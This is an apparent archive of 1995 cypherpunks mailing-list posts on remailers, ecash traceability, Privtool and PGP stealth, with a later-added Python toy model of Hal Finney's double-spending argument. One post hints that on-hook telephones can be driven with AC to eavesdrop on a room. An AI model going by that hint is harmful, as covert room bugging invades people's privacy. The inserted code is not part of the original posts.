> I wonder. Where is the commercial market for remailers? Who has an
> application for them except hobbyists? Why would there be a commercial
> incentive to run a mixmaster server, or even a client?
>
> Could this "offer" be a red herring?

I wondered the same thing myself.  It would certainly be a more
cost-effective way for the NSA to compromise Mixmaster technology
than by brute force.

Consider this scenario ...  Mixmaster gets bought by the Acme
Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
version.  It's even FREE (for non-commercial use)!  But their
"improvements" make it incompatible with previous versions, and so
you have to upgrade.  The new "commercial" version comes with no
SOURCE CODE, of course...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Sep 95 17:47:42 PDT
To: cypherpunks@toad.com
Subject: Celco Sting
Message-ID: <199509150047.UAA05488@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There's more on the cell-phone sting reported in the NYT 
Tuesday at:

   URL: gopher://justice2.usdoj.gov/00/usao/new_jersey/nj62.txt


[Snippet]

   Secret Service "Operation Cybersnare"


   Arrested late Friday were:

   "Chillin," "Led," "Alpha Bits," "Mmind," "Cellfone" and "Barcode."

   A computer "hacker" is an individual with expertise in gaining
   unauthorized entry into computer systems.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:50:12 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509150047.UAA18025@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02130501ac7e53505548@[18.157.1.107]>,
joseph@genome.wi.mit.edu (Joseph Sokol-Margolis) wrote:

>Here's my question, and a thought to ponder: If it is/becomes illegal to
>have links on a homepage to pornography because it is ruled as the same as
>having the pornography there; then can you have links to pages with links
>(the same as having it) to pornography? This repeats, so would it be legal
>to links at all?

The answer is trivial. If it pisses off the fascists in power enough, you
go to jail or get killed.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjNIyoZzwIn1bdtAQFtXQGAkgf19PR9xYU91knoFXfYCR5NaPyWCcPz
BfpmmPksdMUFCk73R4rMJIc+LruHQGb9
=2aYL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:57:32 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <199509150055.UAA18048@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141935.AA09315@argosy.MasPar.COM>, koontz@MasPar.COM
(David G. Koontz) wrote:


>While not every telephone, every telephone switch is required
>to be tap capable  - The Digital Telephony Act.  Note there is
>provision for the government to pay costs for Telcos to make 
>their phones tappable - as yet unfunded by Congress.

Most telephones can be used to monitor conversations in the room they are
installed in even while on-hook. No need to ever enter the premises. Just
drive it with AC.  Look at your basic telephone diagram and remember
Xc=1/(omega*C) from your AC circuits class.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk
+cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9
=elV9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 19:02:46 PDT
To: cypherpunks@toad.com
Subject: Re:  Celco Sting
Message-ID: <9509150202.AA07087@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>   A computer "hacker" is an individual with expertise in gaining
>   unauthorized entry into computer systems.

I heard the special agent in charge being interviewed on NPR this
morning.  He was very careful to distinguish between "classic hackers"
who just poke around for their own edification, and those who are
using networks to actively commit crimes.  My paraphrase, but it
was definitely a praiseworthy viewpoint.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 19:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509150206.AA07108@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Suppose we interpret Linking = Showing as
>
>For all web pages x and y,
>Showing(x) and  Linkto(x,y) --> Showing(y)

Then we would be fools.  No more so than buying a book means you
have instant access to all resources mentioned as footnotes or in
the bibliography.

Put more simply, *you have to click on Y* so they're not the same.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Sep 95 22:34:01 PDT
To: cypherpunks@toad.com
Subject: Why ecash is traceable
Message-ID: <199509150532.WAA08865@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been considerable discussion on sci.crypt and on the 
cypherpunks list about the fact that currently proposed digital cash is 
"traceable", or to put it another way, that there is no payee anonymity.  
This is an annoying asymmetry, where the payor is protected more than 
the payee.  But there is a fundamental reason for this, which I want to 
explain here.  It is not just perversity on the part of digital cash 
designers.

The problem is that there is a conflict between the desire for payee 
anonymity and the need to prevent double spending.  And preventing 
double spending is far more important, since without that the cash would 
be worthless.  Here is how the conflict occurs.

Suppose Alice has a piece of digital cash which she wants to spend with 
Bob.  She goes through some protocol and transfers data to him.  Bob, 
then or later, sends some resulting data to the bank and gets his 
account credited.  Now if Alice spent that same coin with Charlie, we 
need to have the bank find it out.  When Charlie deposits his data with 
the bank, and the bank compares that with what Bob sent in, there must 
be a red flag that goes up.

The fundamental requirement of preventing double spending implies that
Bob's and Charlie's data, when sent to the bank, has some correlation
which will identify the fact that they both come from the same coin.
It doesn't matter exactly what the form of this data is, or how it has
been blinded and stirred, but if double spending is to be detected
there must be a correlation which the bank can see.

But this correlation is what makes the coin traceable.  Suppose Alice is 
paying a coin to Bob via an anonymous network, and she and the bank 
are going to try to figure out who he really is.  She goes through the 
payment transaction, and Bob sends his resulting data to the bank.  
Before doing so, though, Alice simulates a payment of the same coin to 
Charlie.  Charlie doesn't actually have to be involved, Alice can just 
go through what she would have done if she had spent the coin elsewhere.  
The result of this simulated payment has been shared with the bank.

Now, when Bob deposits his data, the bank compares it with the data 
Alice sent, the result of her simulated spending of the same coin.  By 
the argument presented above, Bob's deposit will be flagged.  It will 
correlate with the data Alice sent in since this will be the equivalent 
of a double-spending.  So when Bob makes the deposit he can be linked to 
the specific coin payment which Alice made, and his anonymity is lost.

It would seem that any system which is capable of detecting double-
spending just from the information which the payees send in to the bank 
would be vulnerable to this.  Systems which use tamper-proof observer 
chips to prevent double spending beforehand can avoid it, but of course 
if someone breaks an observer the whole cash system might crash.  In 
general it does not look like payee anonymity is possible without giving 
up other very important features.

Hal Finney
hfinney@shell.portal.com
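
[Added example, not part of Hal Finney's post: a toy model of the argument
above. The names Coin, Bank, Transcript and link_tag are hypothetical; the
hash used as link_tag stands in for whatever correlation a real scheme
exposes, and the bank's signature on the coin is left out.]

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Transcript:
    """Data a payee holds after a payment and later sends to the bank."""
    link_tag: str   # coin-dependent value, identical for every spend of a coin
    challenge: str  # chosen per payment, so two spends give different data
    response: str   # payer's answer to the challenge, bound to the coin


class Coin:
    """Toy coin. Only the payer knows the secret (assumption of this model)."""

    def __init__(self):
        self._secret = secrets.token_bytes(32)

    def spend(self, challenge: str) -> Transcript:
        tag = hashlib.sha256(b"link" + self._secret).hexdigest()
        resp = hmac.new(self._secret, challenge.encode(),
                        hashlib.sha256).hexdigest()
        return Transcript(tag, challenge, resp)


class Bank:
    """Keeps every transcript it is shown, indexed by the correlating value."""

    def __init__(self):
        self.seen = {}      # link_tag -> list of source labels
        self.balances = {}  # account -> number of coins credited

    def _record(self, source: str, t: Transcript) -> list:
        earlier = list(self.seen.get(t.link_tag, []))
        self.seen.setdefault(t.link_tag, []).append(source)
        return earlier

    def report_simulated_spend(self, payer: str, t: Transcript) -> None:
        # The payer hands over what a second payee *would* have deposited.
        self._record("reported-by:" + payer, t)

    def deposit(self, account: str, t: Transcript) -> dict:
        earlier = self._record("deposit:" + account, t)
        already_paid = any(s.startswith("deposit:") for s in earlier)
        if not already_paid:
            self.balances[account] = self.balances.get(account, 0) + 1
        # "flagged" is the red flag: this data correlates with earlier data.
        return {"flagged": bool(earlier),
                "credited": not already_paid,
                "linked_to": earlier}


def run_scenario():
    bank = Bank()

    # Case 1: a real double spend. The second deposit raises the flag.
    coin1 = Coin()
    first = bank.deposit("acct-bob", coin1.spend("nonce-from-bob"))
    second = bank.deposit("acct-charlie", coin1.spend("nonce-from-charlie"))

    # Case 2: the payer simulates a second spend and shares it with the bank
    # before the payee deposits. The same check now links payee to payment.
    coin2 = Coin()
    paid_to_bob = coin2.spend("nonce-from-bob-2")
    bank.report_simulated_spend("alice", coin2.spend("nonce-made-up-by-alice"))
    traced = bank.deposit("acct-bob", paid_to_bob)

    # Case 3: control. A coin nobody reported deposits without any link.
    clean = bank.deposit("acct-dave", Coin().spend("nonce-from-dave"))
    return bank, first, second, traced, clean


if __name__ == "__main__":
    _, first, second, traced, clean = run_scenario()
    for name, result in (("first", first), ("second", second),
                         ("traced", traced), ("clean", clean)):
        print(name, result)
```

Cases 1 and 2 go through the same lookup in Bank.deposit: the bank cannot
tell "detecting a second spend" apart from "matching a payer's report".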




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 19:52:46 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509142253.SAA63671@tequesta.gate.net>
Message-ID: <Pine.D-G.3.91.950914224730.17369B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Jim Ray wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Brian Davis wrote:
> 
> <snip>
> 
> >Just wondering about liability issues after state accrediting is dead.
> 
> <snip>
> 
> <I can resist jumping in no longer...>
> 
> Despite loud squawking, "chaos" will not ensue. Instead, the private
> sector will take over assessing risk, which it has always done better.
> 
> An example: I'd rather jump into a full bathtub with a plugged-in,
> UL [Underwriter's Laboratories] certified TV set than take the FDA
> approved (but very dangerous, IMO) prostate drug called "Proscar."
> While there is only one UL (by choice, not force) and only one FDA
> (by force, not choice) I can easily imagine a  lawyer-certifying
> companies like UL for appliances, probably tied [like UL] to the
> insurance industry. [I am not a lawyer, or a doctor either.]
> JMR

Last I checked, FDA, UL, or state bar association approval does not 
*require* you to take, use, or hire the approved drug, toaster or lawyer.  
Market forces are still at work, albeit in a filtered environment.
Just a first cut.  And even that can usually be gotten around.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 14 Sep 95 15:00:55 PDT
To: alt.security.pgp@news.news.demon.net
Subject: Privtool 0.85 Released
Message-ID: <Pine.3.89.9509142224.A21514-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi,

I've just released a new version of Privtool, with a large number of
bugfixes and new features. It's available from ftp.c2.org as
/pub/privtool/privtool-0.85.tar.gz, and in Europe from
ftp.dsi.unimi.it in /pub/security/crypt/code, or from ftp.ox.ac.uk
in /pub/crypt/pgp/utils.

DUE TO US ITAR REGULATIONS, IF YOU ARE OUTSIDE THE US YOU SHOULD
DOWNLOAD PRIVTOOL FROM A NON-US SITE. Dumb, but true...

Documentation is also available on the WWW at 
http://www.c2.org/~mark/privtool/privtool.html.

	Mark




	Privtool Beta Release	@(#)README.1ST	1.34 9/12/95
	-----------------------------------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement 
for the standard Sun Workstation mailtool program, with a similar user 
interface and automagick support for PGP-signing and PGP-encryption. Just 
to make things clear, I have written this program from scratch, it is
*not* a modified mailtool (and I'd hope that the Sun program code
is much cleaner than mine 8-) !). 

When the program starts up, it displays a list of messages in your 
mailbox, along with flags to indicate whether messages are signed 
or encrypted, and if they have had their signatures verified or 
have been decrypted.

When you double click on a message, it will be decrypted (requesting
your passphrase if necessary), and/or will have the signature checked,
and the decrypted message will be displayed in the top part of the
display window, with signature information in the bottom part. The
mail header is not displayed, but can be read by pressing the 'Header'
button to display the header window. In addition, the program has
support for encrypted mailing list feeds, and if the decrypted
message includes another standard-format message it will replace
the original message and be fed back into the display processing
chain.

When composing a message or replying to one, the compose window has
several check-boxes, including one for signature, and one for
encryption. If these are selected, then the message will be automatically
encrypted and/or signed (requesting your passphrase when necessary) before
it is sent. You may also select a 'Remail' box, which will use the
Mixmaster anonymous remailer client program to send the message through
one or more remailers.

Being a Beta release, there are a number of bugs and nonfeatures :

Known Bugs :

	When you save changes to the mail file, it throws away the
	signature verification and decrypted messages, so that the
	next time you view a message it has to be verified or decrypted
	again.

	Privtool requires that the /usr/spool/mail directory is
	world-writable. Some versions of Linux are set up to have
	mail programs setgid mail, and have write access only to
	mail and root, causing hangs when saving changes. This will
	be fixed in the next release.

	Header window is not updated if left open.

	Date parsing on Linux is not quite correct.

	Problem with compose window layout if using Bcc: or extra
	header lines.

	Crashes if you tab from the Cc: field to the message body.

Known Nonfeatures :

	Currently if you send encrypted mail to multiple recipients, all must
	have valid encryption keys otherwise you will have to send the
	message decrypted. Also, the message will be sent encrypted to all
	users, not just the one who is receiving each copy.

	Only one display window.

	Code should be more modular to assist with ports to Xt, Motif, Mac,
	Windows, etc. 

	Not very well documented !

	Encrypted messages are saved to mail files in encrypted form. There
	is currently no option to save messages in decrypted form.

	No support for anonymous return addresses.

	Not very well tested on Solaris 2.x, or Linux.

Changes for 0.85:

	Support for Reply-To: addresses in message headers.

	If you have PGP Tools, then the passphrase is now stored in
	MD5 form rather than as ASCII text. This will make it harder
	to steal your passphrase if you're running on a multi-user
	machine (which you shouldn't be, but many of us are).

	Improved documentation.

	'New mail' indicator in icon now goes away if you open the
	window and close it again without reading any messages.

	Support for multiple compose windows - no more pressing
	'Reply' and screaming because you deleted the message you
	were editing !

	Query on exit if any compose windows are open.

	Show busy cursor for time-consuming operations.

	Kill-by-name and Kill-by-subject now work correctly.

	'Add Key' button now works.

	Optionally beep on bad signature.

	Added various changes from Anders Baekgaard (baekgrd@ibm.net),
	we can now use a more normal icon if preferred, pass arguments
	on the command line, specify the font to use, support the
	'showto' option, allow X-resources to be set up, fix a bug
	in Linux which showed the message list as a black box, cleaned
	up some warnings from x.c, support bcc:, and have an option
	for a simplified, smaller, display layout for machines with
	small screens.

	Fixed some memory leaks in deliver_proc ().

	Anders finally got the scrollbar to go to the right place
	when opening mail files ! Yay !!!!

	Fixed bad arguments that were being passed to bzero() in
	pgplib.c and potentially causing random memory overwrites.

	Fix for Linux icon corruption from A J Teeder (ajteeder@dra.hmg.gb).

	Added 'resend' to resend a message that failed the first
	time.

	Added Linux-specific Makefile, now that I have my own Linux
	box to test it on.

	Fixed SEGV when delivering messages (with some .mailrc files), 
	caused by a bug in the alias-handling code.

Privtool can be compiled to either use PGP Tools, or to fork off a copy of
PGP whenever it is needed. There are also a number of different security
level options for the passphrase, varying from 'read it from PGPPASS and
keep it in memory' to 'request it every time and delete it as soon as
possible', via 'request it when necessary and delete it if it's not used
for a while'.

Unfortunately, PGP Tools (or at least the version that I have) does not 
appear to work correctly on Linux.

See the README file for information on compiling the code, and the
user.doc file for user documentation (the little that currently 
exists). You should also ensure that you read the security concerns
section in user.doc before using the program.

		Mark Grant (mark@unicorn.com)



-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 20:11:58 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
In-Reply-To: <ac7de719050210049b11@[205.199.118.202]>
Message-ID: <9509150310.AA32542@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The cave analogy sucks.

The way I tried to explain Zero Knowledge is this:


Imagine that you have a duplicator device which you want to sell, you don't
want to explain why it works to the buyer however since then they would 
just make their own (patents have been abolished by this time). You also don't 
want the buyer to be able to prove to anyone else that you have a duplicator.

So what you do is you play the "what hand is it in" game, and you do this with a 
10$ bill provided by the buyer, who records its serial number. You hold the 
original article in one hand and the duplicate in the other. The buyer chooses 
one hand, you show the article in that hand. The buyer knows you had a 50:50 
chance of a lucky guess so you do it again, each time the probability of getting 
it right by a lucky guess halves. After 10 tries or so it is virtually certain 
that you were not faking.


Any better ideas...

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 20:22:10 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <9509150321.AA28976@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>ANYBODY on this list seen some real kiddy porn on the net? I am talking
>intercourse, etc., not scans of six year olds from the Sears catalog, or
>naked boys building sandcastles on the beach.

Yes, I was specifically referring to hard core images depicting intercourse with 
minors, including very young children. This was injected into the USEnet over a 
period of about 3 months from a number of sites. I do not know if the persons 
arrested today are the alleged source.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 00:14:56 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac7e684708021004f594@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Hal, a very nice summary!

I have some questions, though.

At 5:32 AM 9/15/95, Hal wrote:

>The problem is that there is a conflict between the desire for payee
>anonymity and the need to prevent double spending.  And preventing
>double spending is far more important, since without that the cash would
>be worthless.  Here is how the conflict occurs.

Agreed, any system which makes double spending possible results in a
currency collapse as the currency becomes worthless.

Chaum points out that there "is no digital coin," that is, that software
(numbers) must by their nature be easily copyable. Thus, any system to
prevent double (triple, quadruple, etc.) spending must take this into
account.

Why not "online clearing" as the preferred model, then?

To use your example:

>Suppose Alice has a piece of digital cash which she wants to spend with
>Bob.  She goes through some protocol and transfers data to him.  Bob,
>then or later, sends some resulting data to the bank and gets his
>account credited.  Now if Alice spent that same coin with Charlie, we
>need to have the bank find it out.  When Charlie deposits his data with
>the bank, and the bank compares that with what Bob sent in, there must
>be a red flag that goes up.

With online clearing, Bob sends his data to the relevant bank, confirms
that his account has been credited, and tells Alice that her "check has
cleared," so to speak, and the transaction is completed. Then, when Alice
tries to spend the "same" digital cash with Charlie, he sends his data to
the bank and the bank tells him the money has already been spent. Charlie
informs Alice that the transaction has failed, that her money is no good.

I'm not claiming this is how Chaum's currently-available system works, only
that nothing in Chaum's scheme hinges on a True Name, of course. So with
online clearing, the second spending is blocked, but there is still no
leakage of identity, is there?


>The fundamental requirement of preventing double spending implies that
>Bob's and Charlie's data, when sent to the bank, has some correlation
>which will identify the fact that they both come from the same coin.
>It doesn't matter exactly what the form of this data is, or how it has
>been blinded and stirred, but if double spending is to be detected
>there must be a correlation which the bank can see.

I agree. But this is like the following analogy:

Alice has a special kind of money, called a "train locker combination."
This special kind of money is the location of a storage locker and the
combination of a lock on the locker. She "spends" this special kind of
money by giving this information to the person she is paying. The recipient
has a couple of basic options:

1. Send someone to verify that the locker contains the specified goods, at
which point the transaction is completed. This is equivalent to ONLINE
CLEARING.

(I'm not going to get into the situation where he gets the money, then
cancels or reneges on the deal....this is a possibility in "cash"
transactions as well, save with escrow schemes, and even then...)

2. Accept the word of Alice (in the sense of not actually transferring the
money via online clearing) and count on systems which implicate her if she
tries to spend the money a second time, i.e., tries to tell someone else
the locker and combination.

(The "observer chip" option Chaum raises, and which may have a parallel
here, I'm not considering. I'm deeply suspicious of solutions calling for
tamper-resistant hardware...just not very strong by cryptographic
standards, etc. Maybe I'm just ignorant, but the observer chip approach
Chaum described in his "Scientific American" article a few years ago was
unconvincing to me.)

The elegance of the first option, online clearing, is that Alice is
motivated to keep her secret information (the money) secret, and that once
it is "spent," or cleared and transferred, there's no going back. She can't
renege, she can't collude with the bank to see where it went. The bank,
upon valid receipt of an order to "cash" the "check" then could place the
money in an "envelope" (in Chaum's terms) supplied by Bob and then post it
in a message pool. (Bob can submit his claim to the money via remailers,
and receive the money-in-envelope via remailer return replies (if they ever
get perfected, as I suspect they will be) or via message pools. Bob
receives the envelope and reverses the blinding operation, thus having cash
not traceable to him in any way.

I'm persuaded that the second approach, involving protocols for revealing
double spending, is much messier than the "he who gets there first"
protocol. The online clearing model largely emulates how real physical cash
works, where there is a direct transfer, where the cash must be protected
against loss (lose it and you're just out of luck, unlike, say, as with
traveller's checks, which are account-based), and where a kind of "online
clearing" is actually done when the cash is checked to see if it's
counterfeit.


>But this correlation is what makes the coin traceable.  Suppose Alice is
>paying a coin to Bob via an anonymous network, and she and the bank
>are going to try to figure out who he really is.  She goes through the
>payment transaction, and Bob sends his resulting data to the bank.
>Before doing so, though, Alice simulates a payment of the same coin to
>Charlie.  Charlie doesn't actually have to be involved, Alice can just
>go through what she would have done if she had spent the coin elsewhere.
>The result of this simulated payment has been shared with the bank.

With online clearing, this kind of "sting" by Alice is impossible (at least
in the way described here). Alice pays Bob, Bob sends his data to the bank,
the bank reports the money has already been transferred (or, simply reports
back "invalid transaction").

An account-based system, one that doesn't do online clearing, will need the
correlation that Hal cites. An online system will not...whoever gets to the
money first gets it, as with real cash.

(There are more abstract ways of viewing this advantage. While mere
software is always duplicable, and cash numbers are of course duplicable,
one thing that is not duplicable is this: "the first agent to present a
valid number at this bank." There can be only one of these, and this
uniqueness is what keeps the currency from collapsing, what introduces
_conservation_ into the system.)

>Now, when Bob deposits his data, the bank compares it with the data
>Alice sent, the result of her simulated spending of the same coin.  By
>the argument presented above, Bob's deposit will be flagged.  It will
>correlate with the data Alice sent in since this will be the equivalent
>of a double-spending.  So when Bob makes the deposit he can be linked to
>the specific coin payment which Alice made, and his anonymity is lost.

Well, since Alice knows her own blinding factors, she will always be able
to say to the bank: "My cash will look like this. Watch for it."

The key is for Bob to take the cash Alice gives him and communicate to and
from the bank with mixes, as described above.


                       Bank
                      /    \
                     /      \
                    /        \
                 Alice - - - Bob


(Sorry I can't flesh out this diagram....ASCII just won't cut it. Mere
English is even worse at describing these transactions.)

Another elegant way of viewing things: If Alice colludes with the bank, by
doing a fake-spend with the fake "Charlie," or by reporting to the bank
what her blinding factor will be and hence what "her" cash will look like,
then effectively the transaction collapses to:


                 Alice/Bank
                      \
                       \
                        \
                        Bob

But if Bob can get cash from the bank that the bank cannot trace, via the
blinding factors, then Bob can get cash from the Alice/Bob collusion. The
fact that Alice can correlate a particular transaction to Bob's contact
with the bank can be defeated by Bob using anonymous remailers to protect
his identity.

My Apologies: I suspect I've been rambling a bit, thinking out loud by
typing. There are different issues involved here: offline vs. account-based
systems, the use of remailers and message pools to sever the links between
transactions and identities, and the (mostly unmentioned) role of
third-party escrow agents and "anonymizers." (Think of what happens when
online clearing is used to shuttle the cash between N different
agents...even if Alice is colluding, will Candy, Devon, Eric, Floyd, etc.
all be in the same collusion set?)


>It would seem that any system which is capable of detecting double-
>spending just from the information which the payees send in to the bank
>would be vulnerable to this.  Systems which use tamper-proof observer
>chips to prevent double spending beforehand can avoid it, but of course
>if someone breaks an observer the whole cash system might crash.  In
>general it does not look like payee anonymity is possible without giving
>up other very important features.

I don't think all systems must be able to deal with double spending.

For example, the first person to read this number: 45%2)d[12ks&Qmdx and to
then submit it in any form--in person, by e-mail, via remailer, etc.--to The
First Bank of Cyberspace will have $10 sent to him or her, as cash or as a
spendable amount of digicash (untraceable to recipient, of course).

Where's the payee traceability that I, the payer, have?

(The key is that I don't have to deal with double spending, as there is
only one "first person to ....")

I believe Chaum has thought about the issues in creating "Pure Digital
Cash." While a pure "digital coin" may not be possible, I believe a two-way
untraceable digital cash system is possible.

Frankly, I think Chaum's work on DC-Nets points the way, though even
simpler realizations may be enough for practical purposes.

My hunch, just a hunch, is that Chaum has been concentrating on the
particular protocols which avoid online clearing and which avoid the
payer/payee untraceability for pragmatic reasons. Pragmatic as in
"politically wise."

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 21:25:35 PDT
To: cypherpunks@toad.com
Subject: [non-crypto] Any info on Motorola Digital cell phone?
Message-ID: <199509150423.AAA19333@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well, I finally broke down and bought a cell phone.  Motorola Digital
52134 flip style. Would the (numerous) cell phone pros on this list please
get in touch with me and teach me the things not mentioned in the manual?

Thanks guys and gals,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFj/pyoZzwIn1bdtAQGVTAGAmjw4ryqx3SiaPyFscACXsgCfq7ATT5EZ
8URi+2KH2e5xSLeOgj0+R+Z6Bcvvxoas
=zXFO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 00:26:14 PDT
To: perry@piermont.com
Subject: Re: PGP in UK - snooped as unSTEALTHed?
Message-ID: <199509150725.AAA11217@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 AM 9/12/95 -0400, Perry wrote, replying to Gary:
>>    When are the PGP designers and coders going to get serious
>>    and develop STEALTH PGP inside PGP itself!?
>Never, I hope. It would dramatically lower the utility of the
>system. Can you imagine how disgusting it would be to try decrypting
>something if you have a dozen keys outstanding? 

I disagree - if it's done right, the degree of stealth can be
user-selectable, and even moderately stealthy options can tell
which key to use without giving away much information.  (For instance,
4 bits of keyid isn't very revealing, but will tell you which one or
two of your dozen keys to try.)  Have the most non-stealth options
indicate that it's PGP-encrypted and addressed to keyid 0x12345678,
Joe User <joe@foo.com>, blah, blah.

The basic problem is that stealth wasn't an original design criterion,
so many parts of the PGP data format reveal at least that PGP is
being used, and occasionally other information as well.  Some things
are easy to work around (----- BEGIN PGP etc.), and some aren't.
Changing this takes a substantial amount of redesign.

>Not to mention how
>hard it would be to deal with figuring out that you should even try to
>decrypt things in the first place.
As you say a couple paragraphs later:
>If someone sees a bunch of random numbers in mail sent by me, it's going 
>to be pretty obvious what the hell is inside anyway.
Similarly, if someone emails you a bunch of random numbers....

>I very much see this whole thing as a non-issue.

Most of the time, for most users now, it's not an issue.  
But there are people who will need to hide encrypted messages, 
and as anti-privacy laws in the US become stronger, that may be us.
Is this an issue for PGP 3.0.1, or an issue for Privacy:TNG?
Probably the latter, given the state of the PGP world,
and certainly ranting at the developers to do it now is uncool.
But it should be a design goal.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 01:06:28 PDT
To: cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <ac7edf5800021004fd74@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I apologize for being so terse in my first message. This is not a red
herring. The organization that has approached me is very pro-privacy and
anonymity. I see nothing but good coming from this venture.

I will be very active in the development of the commercial version of
Mixmaster.

Let me be crystal clear.
1) I will not support any version of Mixmaster that is weakened.
2) All future clients will be able to generate the current message format.
3) All future servers will be able to read the current message format.
4) There will always be a free version of the client with source code.

While I have not discussed it, I can not imagine that there would not also
be a free version of the server code (with source). Without remailers what
is the point of the client software? 


At 8:45 PM 9/14/95, ROBO Mixmaster Remailer wrote:
>Flame Remailer <remailer@flame.alias.net> wrote:
>
>> Subject: Mixmaster status
>>
>>   There has been an offer to purchase and commercially develop Mixmaster.
>>   This will hasten the development of Mixmaster for other platforms (e.g.
>>   Dos, Windows, Macintosh), and bring significant improvements to the
>>   interface, but I will not compromise on the level of security provided by
>>   Mixmaster. Free client software will continue to be available.
>>
>>   This could be the big breakthrough for remailers, finally thrusting them
>>   out of the hobbyist's closet into the corporate world.
>>
>> I wonder. Where is the commercial market for remailers? Who has an
>> application for them except hobbyists? Why would there be a commercial
>> incentive to run a mixmaster server, or even a client?
>>
>> Could this "offer" be a red herring?
>
>I wondered the same thing myself.  It would certainly be a more
>cost-effective way for the NSA to compromise Mixmaster technology
>than by brute force.
>
